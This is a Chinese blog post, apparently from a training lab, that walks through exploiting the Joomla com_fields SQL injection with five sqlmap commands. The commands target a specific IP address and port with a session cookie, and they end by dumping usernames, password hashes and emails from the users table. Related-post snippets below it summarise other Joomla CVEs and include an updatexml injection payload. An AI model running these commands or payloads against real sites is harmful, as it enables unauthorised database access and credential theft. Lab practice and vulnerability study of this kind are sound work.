Joomla SQL注入

已于 2022-05-15 18:08:46 修改
阅读量588 收藏 3
点赞数
文章标签: SQL注入 sqlmap 数据库 安全漏洞 信息泄露
于 2022-04-07 21:58:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67612076/article/details/124027584
版权

首先:

登录“110.40.154.100:8080”。然后在其后输入 :“index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml”进入这个界面

然后进入sqlmap进入注入:

第一步:sqlmap.py -u"http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"  --cookie="6aa9634b2a2af1ffeca15634d348fefa=9513e386333d7ff59f64a2b10790482e"

第二步:sqlmap.py -u"http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"  --cookie="6aa9634b2a2af1ffeca15634d348fefa=9513e386333d7ff59f64a2b10790482e" --dbs

第三步:sqlmap.py -u"http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"  --cookie="6aa9634b2a2af1ffeca15634d348fefa=9513e386333d7ff59f64a2b10790482e" --tables

第四步:sqlmap.py -u"http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"  --cookie="6aa9634b2a2af1ffeca15634d348fefa=9513e386333d7ff59f64a2b10790482e" -D joomla -T #__users --columns

第五步:sqlmap.py -u"http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"  --cookie="6aa9634b2a2af1ffeca15634d348fefa=9513e386333d7ff59f64a2b10790482e" -D joomla -T #__users -C name,password,email,id,username --dump

可以得到密码,名字,id,邮箱等。

m0_67612076
关注
xray poc-yaml-joomla-cve-2018-7314-sql
课嗨教育的专栏
01-20 3526
漏洞描述 Joomla!是美国OpenSourceMatters团队开发的一套开源的内容管理系统(CMS),该系统提供RSS馈送、网站搜索等功能。PrayerCenter是使用在其中的一个祷告分享组件。Joomla!PrayerCenter3.0.2版本中存在SQL注入漏洞。远程攻击者可借助‘sessionid’参数利用该漏洞查看、添加、更改或删除后端数据库中的信息。 SQL Injection exists in the PrayerCenter 3.0.2 component for Joomla!
SQL注入JOOMLA系列
m0_64181446的博客
04-06 3338
一:首先进入txt平台网站Homehttp://110.40.154.100:8080/?id=1找到报错注入点;将“[ ]”符号转换为url编码。 二:打开kali并开启root权限,利用sqlmap扫描其数据库。--dbs,找出JOOMLA表。 三:进入JOOMLA系列表-D joomla --tables,得出users列表。 四:进入#__users列中并指定想要获取的信息。 得出账号,密码,邮箱 ...
sqlmap 注入 Joomla系列
余笙.'的博客
04-02 5717
这里我用的是 joomla 先进入 txt 网站平台 网站:http://110.40.154.100:8080/?id=1 第一步:找注入点 "http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=" 第二步:打开kali 用sqlmap 爆破 找其数据库名(过程很慢 耐心等待) sqlmap -u "http://110.
CMS Joomla SQL 注入漏洞(CVE-2017-8917 )
CuiXY's Blog
01-18 882
0x01 原理 1.Joomla是内容管理的网站程序,也就是CMS。漏洞原理是com_fields组件,对请求数据过滤不严谨,从而导致sql注入。这个就是有问题的代码,可以看出sql根本没有过滤,通过对list中的fullordering这个字段的精心构造,就可以完成sql攻击 2.追根溯源,网站程序Joomla的com_fields启动时,会调用display这个方法 3.display这个...
Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境
最新发布
weixin_45653478的博客
05-17 642
Joomla是一个基于PHP的内容管理系统(CMS),广泛应用于各类网站。2017年,Joomla 3.7.0版本被发现存在SQL注入漏洞(CVE-2017-8917),攻击者可以利用该漏洞对数据库进行未授权查询或操作,可能导致数据泄露、篡改甚至删除。
Joomla SQL注入漏洞(CVE-2018-8045)复现
玄道的网安博客
09-29 2102
简介 Joomla!是一套全球知名的内容管理系统。Joomla!是使用PHP语言加上MySQL数据库所开发的软件系统 影响版本 joomla版本 v3.5.0 ~ v3.8.5 漏洞原理 可以看到对filter.category_id这个参数进行了一个强制int类型转换 也就是说漏洞发生在此参数上 根据notes.php,触发的代码为 $categoryId这个参数没有经过任何过滤直接拼接到了sql语句中,造成sql注入 环境搭建 下载地址https:/...
joomla内核sql注入漏洞复现
qq_52223347的博客
03-10 495
影响版本 3.5.0-3.8.5 环境搭建:phpstudy 新建一个joomla的数据库 将其解压到www下 浏览器127.0.0.1/joomla 进行安装 漏洞分析: 漏洞代码位于joomla\administratorlcomponents\com_ users\models\notes.php中, $categoryld未经过滤直接拼接sq|语句进行查询,从而造成了sq|注入漏洞的产生。 漏洞利用: 浏览器输入http://localhost/joomla/administrator/进入管理
CVE 2017-8917 Joomla3.7 Core com_fields组件sql注入漏洞复现
BROTHERYY的博客
10-19 2417
1. 漏洞描述 漏洞编号: CVE-2017-8917 危害等级:危急 漏洞简述:本漏洞出现在3.7.0新引入的一个组件“com_fields”,这个组件任何人都可以访问,无需登陆验证。由于对请求数据过滤不严导致sql注入sql注入对导致数据库中的敏感信息泄漏。 影响版本: Joomla!3.7.0 Core 2. 漏洞介绍 这个漏洞出现在3.7.0新引入的一个组件“com_fields”,这个组件任何人都可以访问,无需登陆验证。由于对请求数据过滤不严导致sql 注入,sql注入对导致数据库中的敏感信息泄
Joomla3.7.0 (CVE-2017-8917) SQL注入漏洞复现
weixin_42786460的博客
09-01 1481
Joomla3.7.0 (CVE-2017-8917) SQL注入漏洞复现
Joomla-JCK-Editor-6.4.4-SQL-Injection:利用Joomla JCK Editor 6.4.4
03-06
Joomla-JCK-Editor-6.4.4-SQL注入 Joomla的JCK编辑器Jtreelink插件! 无法正确解析用户输入,从而允许SQL注入。 此漏洞利用了此安全漏洞,并转储了管理员凭据,并可能上载了PHP RCE Shell。 利用标题:Joomla JCK编辑器6.4.4 SQL注入 Googke Dork:inurl:/ plugins / editors / jckeditor / plugins / jtreelink / 日期:05/03/2021 漏洞利用作者:尼古拉斯·费雷拉(Nicholas Ferreira) 供应商主页: : 版本:6.4.4 测试于:Debian 10 CVE:CVE-2018-17254 用法 user @ lol:〜$ php JCKEditor_SQLi_Exploit.php --url target.com/p
Joomla:SQLi利用
prettyX的博客
12-05 528
今天来开拓一下思路 : ) 背景: 当发现SQLi漏洞时,后续如何利用呢?今天尝试一下利用Session登录。 环境准备: BurpSuite Firefox phpstudy:并安装好phpMyAdmin Joomla 3.7.0 下载地址 :https://downloads.joomla.org/cms/joomla3 在phpstudy上将Joomla安装、配置好,并连...
Joomla 3.7.0 SQL注入漏洞
小小猪的博客
12-01 2301
Joomla 3.7.0 SQL注入漏洞 漏洞描述: 漏洞本质是Joomla对session数据处理不当,未经授权的攻击者可以发送精心构造的恶意 HTTP 请求,获取服务器权限,实现远程命令执行。 影响范围: Joomla 3.0.0-3.4.6 环境搭建: 这里采用安鸾渗透实战 地址 漏洞复现: 打开之后页面 安装完成后,构造payload /index.php?option=com_fields&view=fields&layout=modal&list..
cve漏洞复现 php,Joomla注入漏洞(CVE-2018-6605)复现分析
weixin_36143290的博客
03-10 246
复现环境PHP 7.0.10Joomla 3.8.6此插件需要填入百度地图的AK。漏洞复现由于出现的注入点都相同,着重分析此URL:http://localhost/joomla/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails 在对问题URL进行POST请求的参数id...
SQL注入
Zsl1183323的博客
04-07 758
1.寻找注入点: "http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list5B%fullordering5D%=" 2.用kali使用sqlmap爆破,找数据库名: "http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list5B%full
DC-3靶机渗透实战
0XAXSDD的博客
06-11 2695
DC-3靶机渗透 咱们速战速决!我尽量详细一点 打开靶机,nat模式,nmap主机发现,全扫描 80端口,joomla 框架,打开御剑扫描器扫到后台路径和README.txt文件 获得了版本 这个版本有个sql注入漏洞,直接找来payload验证一下 index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1) 确实存在注入漏洞
sqlmap之(四)----Mysql注入实战
fendo
02-27 5292
(1) 查找数据库 sqlmap.py -u "http://localhost/sqls/index.php?id=123" --dbs 数据库有8个。 (2) 通过第一步的数据库查找表(假如数据库名为test) sqlmap.py -u "http://localhost/sqls/index.php?id=123" -D test --ta
Joomla 漏洞总结
星落的博客
04-17 8887
CVE-2015-8562 反序列化漏洞 影响版本 Joomla 3.4.5 CVE-2017-8917 SQL注入漏洞 影响版本 Joomla 3.7.0
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值